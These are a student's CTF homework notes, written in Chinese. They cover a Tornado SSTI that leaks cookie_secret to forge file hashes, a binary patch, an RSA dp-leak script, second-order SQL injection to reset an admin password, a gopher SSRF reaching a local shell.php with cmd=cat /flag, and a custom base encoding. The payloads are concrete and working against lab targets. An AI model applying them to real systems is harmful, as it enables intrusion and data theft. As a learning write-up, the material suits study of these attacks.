1.25作业

1easytornado

SSTI——tornado模板

hints.txt：在/fllllllllllllag里；计算filehash的方法（需要cookie_secret,对filename进行md5+拼接+再第二次md5）

?filename=/hints.txt&filehash={ {2*3}}，跳转到另一个页面
存在且报错回显：读取cookie_secret值
error?msg={ {handler.settings}}
/fllllllllllllag:3bf9f6cf685a6dd8defadabfb41a03a1

/file?filename=/fllllllllllllag&filehash=da37411c3f435649c3abee7c92a1d12b

2

 “运行就能拿到flag”

patcher两处

jzn改为jmp：无条件跳转，int 3  (__debugbreak()改为 nop

F2下断点，避免执行exit函数：F9运行复制flag

3

import gmpy2 as gp
 
e = 65537
n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634283168544492984586566799996471150252382144148257236707247267506165670877506370253127695314163987084076462560095456635833650720606337852199362362120808707925913897956527780930423574343287847
c = 108542078809057774666748066235473292495343753790443966020636060807418393737258696352569345621488958094856305865603100885838672591764072157183336139243588435583104423268921439473113244493821692560960443688048994557463526099985303667243623711454841573922233051289561865599722004107134302070301237345400354257869
dp = 734763139918837027274765680404546851353356952885439663987181004382601658386317353877499122276686150509151221546249750373865024485652349719427182780275825
 
for x in range(1, e):
    if(e*dp%x==1):
        p=(e*dp-1)//x+1
        if(n%p!=0):
            continue
        q=n//p
        phin=(p-1)*(q-1)
        d=gp.invert(e, phin)
        m=gp.powmod(c, d, n)
        if(len(hex(m)[2:])%2==1):
            continue
        print('--------------')
        print(m)
        print(hex(m)[2:])
        print(bytes.fromhex(hex(m)[2:]))

4.1

SSTI——tornado模板

hints.txt：在/fllllllllllllag里；计算filehash的方法（需要cookie_secret,对filename进行md5+拼接+再第二次md5）

?filename=/hints.txt&filehash={ {2*3}}，跳转到另一个页面
存在且报错回显：读取cookie_secret值
error?msg={ {handler.settings}}
/fllllllllllllag:3bf9f6cf685a6dd8defadabfb41a03a1

/file?filename=/fllllllllllllag&filehash=da37411c3f435649c3abee7c92a1d12b

4.2

提示：不在数据库里面
网站管理员

尝试万能密码admin'or 1=1#登陆失败

先注册再登录

敏感目录扫描www.zip源码，三个功能
修改密码功能：注册一个用户名admin'#开头的用户，然后登陆修改密码，就可以去登录admin

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

得到提示得是内网人员：ssrf
过滤了很多，尝试了gopher协议可以

【gopher发一个GET请求】
?url=gopher://127.0.0.1:80/_GET%20/xinan/public/shell.php

【gopher提供一个cmd参数】
?url=gopher://127.0.0.1:80/_GET%20/xinan/public/shell.php%253Fcmd=cat%2B/flag

5

New Base
base本质：进制转换

将二进制流映射到一些字符组成的字符串，以便打印

bin(ord(char))[2:],三三分组替换表中的字符